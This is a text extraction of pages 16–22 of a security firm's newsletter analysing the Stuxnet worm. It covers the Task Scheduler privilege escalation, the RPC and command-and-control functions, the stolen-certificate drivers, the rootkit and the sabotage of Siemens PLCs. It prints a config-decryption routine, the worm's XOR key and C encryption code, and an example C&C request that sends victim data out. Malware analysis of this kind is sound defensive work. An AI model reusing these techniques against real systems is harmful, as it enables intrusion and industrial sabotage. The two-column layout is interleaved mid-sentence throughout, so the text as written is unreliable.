Ludo Benoitit published its bulletin MS10-073, which added a checkto prevent the use of an index that overflowed the tableof associated data.The second vulnerability relates to the task scheduler.The definition of a task is stored in an ordinary XML filecontained in the directory "%SystemRoot%system32Tasks". Access to this directory is restricted.Even so, an XML file (corresponding to a task)contained in it is accessible and can be written to by theuser who added it. Secondly, the description XML filecontains, among other things, information related to theexecution of the task; for example: the user and therequired level of privileges. A user who defined a taskcan therefore freely change the identifier of the userand the level of privileges required, in order to elevateprivileges.To protect against this type of attack, Microsofttherefore introduced a "security feature" whichcalculates a hash of the file corresponding to a taskwhen it is defined. This is checked before the task isexecuted. But the CRC32 algorithm used for WWW.XMCO.FRcalculating this hash is unfortunately not designed foroperations related to security. It is too weak to fulfill thisrole because it is relatively easy to implement collisions.It is actually nothing more than a straightforward CRCcalculation of the XML file. By adding data into acommented field, it is therefore easy to produce a validfile with the same hash as the original, after it has beenmodified. This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![16]
  17. 17. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27Functioning of the malware proliferation have been added to it by its designers. Among these are functionalities allowing it to spread,The malware can be decomposed into several files. The hide itself and lastly to update itself. These correspond,main module, which takes the form of a DLL, is packed overall, to the various functions (21) exported bywith UPX. This module is executed at the start of an Stuxnets main module:attempt at compromise, whatever the vector (USBdrive, network or SQL). As has previously been Function 1: infect removable media and launch theexplained, the malware uses four zero-day Windows RPC server;vulnerabilities to spread via different vectors (USB and Function 2: intercept the calls to certain functions inlocal network). All of these techniques are used to order to infect .S7P and .MCP files corresponding toinstall it on a system. In the most widespread case of Step7 projects;infection by opening a directory present on a USB drive, Function 4: initiate the Stuxnet uninstallationthe exploitation of the LNK vulnerability launches procedure;execution of the main module. Function 5: check that the rootkit (the kernel driver MrxCls.sys) is correctly installed;Functionalities provided Functions 6 and 7: return the version of Stuxnet installed;Among other things, execution of this module launches Functions 9, 10 and 31 (13?): update the malwarea rootkit to hide the malicious files present on the USB from Step7 filesdrive. For this, certain system functions associated with Function 14: infect Step7 files;the shared libraries "ntdll.dll" and "kerneI32.dll" are Function 15: point of entry for the system-infectionintercepted so that code can be injected, and to hide routine;the presence of various malicious files based onspecific criteria (".lnk" with a size of 1,471 bytes and Function 16: infect the system (installation of drivers,"WTRabcd.tmp" files for which the sum of a, b, c and d DLLs, resources, code injection, etc.);modulo 10 is equal to 0). Function 17: replace a Step 7 DLL so as to be able to intercept the calls to certain functions; Function 18:The malware is capable of injecting executable code complete uninstallation of the malware; Function 19:into running processes or into another process whose infect a USB drive;name corresponds to that of an antivirus program. Function 22: infect remote systems via the localThese operations mean that it is not necessary to load network;a file that would risk being detected by an antivirus Function 24: check the Internet connection;program. Function 27: RPC server; Function 28: dialogue with the command and control (C&C) server; Function 29: dialogue with the C&C server and exakta execute the code returned; Function 32: RPC server used by the service server to respond to certain RPC calls; Several network functionalities are implemented within the malware. Among these are the RPC client and server. P2P communications and the use of a C&C are mainly used to keep the malware up to date and to recover information. Nevertheless, these could be used to download and install other malware or to exfiltrate WWW.XMCO.FR sensitive information stolen from the compromised system.Several other functionalities useful to the malwares This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![17]
  18. 18. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27Installation of an RPC server #decrypt function on python def decrypt(key, counter, sym):The RPC server is subdivided into two components for v0 = key * countermanaging local and remote RPC calls. For this, Stuxnet v1 = v0 >> 0xbinfects different processes according to the type of RPC v1 = (v1 ^ v0) * 0x4e35call to be managed: "services.exe" for "local" calls, or v2 = v1 & 0xffffone of the processes "netsvc", "rpcss" or "browser" for v3 = v2 * v2 v4 = v3 >> 0xdremote RPC calls. The various RPC methods are as v5 = v3 >> 0x17follows: xorbyte = ((v5 & 0xff) + (v4 & 0xff)) & 0xff Method 1: returns the version of Stuxnet; xorbyte = xorbyte ^ ((v2 >> 8) & Method 2: loads the module passed as a parameter 0xff) xorbyte = xorbyte ^ (v2 & 0xff)in a new process and executes the specified exported return xorbyte ^ symfunction; Method 3: loads the module passed as a parameterinto the memory space of the current process and callsthe first exported function; This file contains several items of information, such as Method 4: loads the module passed as a parameter the list of servers used to check the Internet connectioninto a new process and executes it; ("", ""), the list Method 5: creates a "dropper" and sends it to a of C&C servers ("", ""), the dates and times ofcompromised system; activation and deactivation of the worm, after which the Method 6: executes the specified application; worm installs itself automatically using the previously- Method 7: reads the data from the specified file; mentioned functions, the version of the malware, the Method 8: writes the data into the specified file; minimum number of files that a USB drive must contain Method 9: deletes a file; to be able to be infected using malicious LNK files, and Method 10: performs various tasks from the names of lastly, other ancillary information used for the correctfiles intercepted using the "hooks" installed by "Method functioning of the worm and its propagation.2", and writes the information into a log file.It appears that the last three methods implemented are Concerning the functioning mode of the C&C servers,not used by Stuxnet. an instance of Stuxnet does not exchange plaintext messages with the two previously-mentioned servers.Thanks to this mechanism based on RPC which can be Each of the messages sent over the Internet to theused within the context of P2P communications, servers is encrypted using a very simple algorithm. ThisStuxnet is, among other things, able to update itself on is a simple XOR with the following 31-byte key:a local network from another compromised system. // Encryption char Key[31] = { 0x67, 0xA9, 0x6E,C&C communications 0x28, 0x90, 0x0D, 0x58, 0xD6, 0xA4, 0x5D, 0xE2, 0x72,The second functionality related to the network is a 0x66, 0xC0, 0x4A, 0x57, 0x88, 0x5A, 0xB0, 0x5C,module for communicating with one of the command 0x6E, 0x45, 0x56, 0x1A,and control (C&C) servers. Like the "P2P over RPC" 0xBD, 0x7C, 0x71, 0x5E,function, the module allows a compromised system to 0x42, 0xE4, 0xC1 } ;load malicious code into memory and execute it. // Encryption procedure void EncryptData(char *Buffer, intThe list of command and control servers is specified in WWW.XMCO.FR BufferSize, char *Key)the "%WINDIR% configuration file infmdmcpq3.pnf". {This file of 1,860 bytes may be decrypted with the for (int i = 0 ; i <following function: BufferSize ; i ++) Buffer[i] ^= Key[i % 31]; return ; } This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![18]
  19. 19. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27The structure of a message sent by the malware is Stuxnets block of configuration data. Lastly, a specially-quite complex. It contains much information specific to designed DLL is placed in the multiple sub-directories ofthe victim. Among this is information related to the the directory "hOmSave7".network interfaces, the version of the OS and of themalware. This message is simply sent to a server that The infection mechanism is relatively simple. When thesends an HTTP GET request to one of the URLs listed project is opened using WinCC Simatic Manager, thein the configuration file. For example: http:// DLL placed in the sub-directories of the "hOmSave7" is automatically sought. When this isdata=STUXNET_CC_MESSAGE. loaded, the library decrypts the protected data and loads the malwares main component into memory toIn response to this request, the server returns a complete the process of infection.message composed of several items: a size coded over “Lastly, to maximize the efficiency of the4 bytes, a flag coded over 1 byte and lastly anexecutable image. If the size of the received messagedoes not correspond to the indicated size of the image+ 5 bytes, the malware ignores this response. If the size proliferation operation, the malwarecorresponds, according to the value of the flag, the searches for the WinCC software. When it ismalware loads the executable image into the memory discovered, Stuxnet connects to thespace of the current process or into another process database used by the software using ausing one of the dedicated RPC methods, thenexecutes it. standard hard-coded password.”It nevertheless appears that this important functionalityhas not really been used, neither to update the software Persistencenor to install additional malicious tools. It neverthelessacts as a hijacked port. The rapid blocking of the To ensure the persistence of the functionalitiesd o m a i n s w w w. m y p r e m i e r f u t b o l . c o m e t previously installed, Stuxnet nevertheless has perhaps had a role in this. profoundly modify the system. This is because it is not possible to inject code into arbitrary processes or to sustainably hide files in the user area without profoundSeeking and infecting the WinCC environment modifications to the system. Two system drivers signed with private keysLastly, to maximize the efficiency of the proliferation corresponding to certificates belonging to Realtech andoperation, the malware seeks the WinCC software. JMicron are therefore installed using the elevatedOnce it is discovered, Stuxnet connects to the privileges obtained from the two proofs of conceptdatabase used by the software, using a standard hard- (Keyboard Layout and Task Scheduler). "MrxCls.sys" iscoded password. Once connected to this database, the used to inject code into a process. "MrxNet.sys" is amalware sends the malicious code via SQL requests, rootkit for hiding the malicious files used to exploit thethen executes it. LNK vulnerability. In contrast to the rootkit used in the user area, this one is persistent.This first action compromises the MSSQL server.Then, the malware modifies the SQL views defined on The fact that these last are signed with stolenthe server to force the execution of code each time certificates means that they can be more discreetlythese views are accessed. installed so as not to arouse the users suspicions (signature essential for installing drivers under WindowsStuxnet is at last capable of infecting WinCC / Step7 7/Windows Vista). The ".lnk" files with a size of 1,471projects associated with WinCC Simatic Manager. The bytes, and the "WTRabcd.tmp" files, for which the sumfiles that are sought and modified have the of a, b, c and d modulo 10 is equal to 0 are filtered so WWW.XMCO.FRextensions .S7P, .MCP or .TMP. Under certain specific that they are not displayed by the file explorer. This filterconditions, files with the names "xutilslisten is active only for the file systems NTFS, FAT and CDFS.xr000000.mdx", "xutilslinkss7p00001.dbf" and "xutils After being registered using the functionlistens7000001.mdx" or "GracScc_alg.sav", "GracS "FileSystemRegistrationChange()", the driver is calleddb_log.sav" and "GracScc_alg.sav" are deposited. In each time a file system is mounted and can thereforeboth cases, these files correspond respectively to an monitor the requests that are sent to it. Thus, the driverencrypted version of the malwares main DLL, to a data can act with complete impunity and choose which filesfile of 90 bytes and lastly, an encrypted version of to display in a directory. This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![19]
  20. 20. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 271: The pirate manages to infect a USB drive used by a person working on a computer connected to the targetinformation system.2: The person uses their USB drive within the target information systems LAN.3: After having infected a Windows workstation, Stuxnet seeks to spread across the LAN.4: Sutxnet contacts its C&C server.5: An employee whose USB drive has been contaminated connects to a workstation equipped with WinCC softwareand belonging to an industrial network.6: When this contaminated workstation connects to a PLC, Stuxnet deposits the malicious code corresponding to PLC 07: The malicious code sends specific orders to the variable frequency drives. WWW.XMCO.FR7 bis: The person responsible for supervising the equipment cannot identify the presence of Stuxnet. This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![20]
  21. 21. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27The resources embedded by Stuxnet keyboard layout (Keyboard Layout) (MS10-073)" " " " " The following exports were observed by Symantec inThe two previously-mentioned drivers correspond the older versions of Stuxnet, but have disappeared inrespectively to resources 201 and 242 of the main the "latest" conversions:module. Eleven other resources are also available, Resource 207: Information related to the exploitationsuch as an executable module PE (210), a link file LNK of a vulnerability using Autorun.inf.(240), and a block of configuration data for the driver"MrxCls.sys" (205) Resource 231: Resource used to check whether the system is connected to the Internet or not. Resource 201: driver "MrxNet.sys" signed usingcertificates belonging to RealTech or JMicron; Resource 202: DLL used in compromising Step 7 INFOprojects; Resource 203: CAB file containing an equivalent ofresource 202 used for compromising WinCC projects; Resource 205: encrypted configuration-data file for Definitionsthe driver "MrxCls.sys"; Resource 208: shared library "s70tbldx.dll" usurping PLC : Programmable Logic Controllerthe functions of the original Siemens DLL; Resource209: file of 25 bytes containing encrypted data Large-scale remote-control system fordeposited in "%WINDIR%help winmic.fts"; the real-time processing of a large number of remote measurements and for Resource 210: model of PE file used for creating or remotely controlling technicalinjecting executables ("-WTR4132.TMP"); Resource facilities. It is an industrial221: malicious code used for exploiting the security technology in the field ofvulnerability present in the server service (MS08-067) instrumentation. A programmable Resource 222: malicious code used for exploiting the controller is a programmable electronic device for controlling industrialsecurity vulnerability present in the print spooler processes by sequential processing. It(MS10-061) sends orders towards the preactuators Resource 240: model LNK file (operative section or operative section on the actuator side) from input data (sensors) (control section or control section on the sensor side),“To ensure the persistence of the instructions and a computer program.functionalities previously installed, Stuxnet SCADA : Supervisory Control And Datanevertheless has to profoundly modify the Acquisition (télésurveillance etsystem. This is because it is not possible to acquisition de données)inject code into arbitrary processes or to Large-scale remote-control system forsustainably hide files in the user area the real-time processing of a largewithout profound modifications to the number of remote measurements and for remotely controlling technicalsystem ... ” facilities. It is an industrial technology in the field of instrumentation. Resource 241: "-WTR4141.TMP", DLL used for WWW.XMCO.FRloading the executable corresponding to resource 221 "-WTR4132. TMP" responsible for installing malware(dropper) Resource 242: Driver "Mrxnet.sys" (Rootkit) used tomask the presence of certain files Resource 250: Malicious code used to exploit thesecurity vulnerability present in the management of the This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![21]
  22. 22. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27Phase 3: Attack on industrial systems equivalent functions in "s70tbxsx.dll".Detection of SCADA systems based on WinCC The 16 functions whose behavior is altered correspond to the methods for reading ("s7blk_read"), writingOnce the Windows system has been compromised and ("s7blk_write"), enumeration ("s7blk_findfirst" andthe malware installed, the third phase of the attack can "s7blk_findnext") and deletion ("s7blk_delete") of thebegin. This corresponds to the search for certain blocks of code present on the PLC. It is by modifyingspecific software. To access the SCADA system, the certain key functions of this library that the attackersauthors of the malware have chosen to go via the ensure the sustainability and discretion of their attack.development tools associated with the target system: To avoid detection when an operator first connects to aStep7 and WinCC. These two tools are respectively compromised PLC, the "read" and "enumeration"used to develop programs operating on systems of the functions hide certain blocks of code from the operatorPLC type and to check their correct functioning. and only return the original "healthy" code.Incidentally, these tools are potentially the only point ofentry to these sensitive systems, given that they are not But not all PLCs are targeted. Stuxnet, using twosupposed to be connected to the Internet, but rather to threads launched by the malicious library, searches fora network dedicated to them. precisely two types of appliance with the references Siemens 6ES7-315-2 and 6ES7-417. The mainTo carry out this third phase of the attack, the malware difference between these two models of controller is thesearches for and replaces the shared library quantity of embedded memory. 256 KB for the series"s7otbxdx.dll". This library, which comes from the S7-315 against 30 MB for the series S7-417.Simatic software suite from Siemens, is used in order tohave a PC running on Windows communicate with a Module 315PLC from the Simatic family. Usually, a developerprograms their equipment with one of the numerous Secondly, in the configuration targeted by the malware,programming languages interpreted by the software the PLCs of series 300 (6ES7-315-2) must use betweensuite, such as STL or SCL. This is subsequently one and six Profibus CP 342-5 modules tocompiled into a specific assembler code called "MC7", communicate with the systems under their control.before being loaded on the PLC. Once again, only certain identification numbers are sought. In the case of Stuxnet, these are the ProfibusBy renaming the shared library "s70tbxdx.dll" as identification numbers "7050h" and "9500h". These"s70tbxsx.dll", then by placing its own version of the numbers uniquely identify the models of these items oflibrary "s70tbxdx.dll", the malware is able to intercept all equipment, which are known as "frequency convertercalls to the functions exported by the original library and drives" or "variable frequency drives". Theto manipulate them at will. In fact, only the behavior of corresponding products are the "KFC750V3"several functions is affected. Most of the calls to the manufactured by Fararo Paya based in Teheran in Iran,functions of "s70tbxdx.dll" are directly sent to the and the "Vacon NX" from Vacon based in Finland. WWW.XMCO.FR This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![22]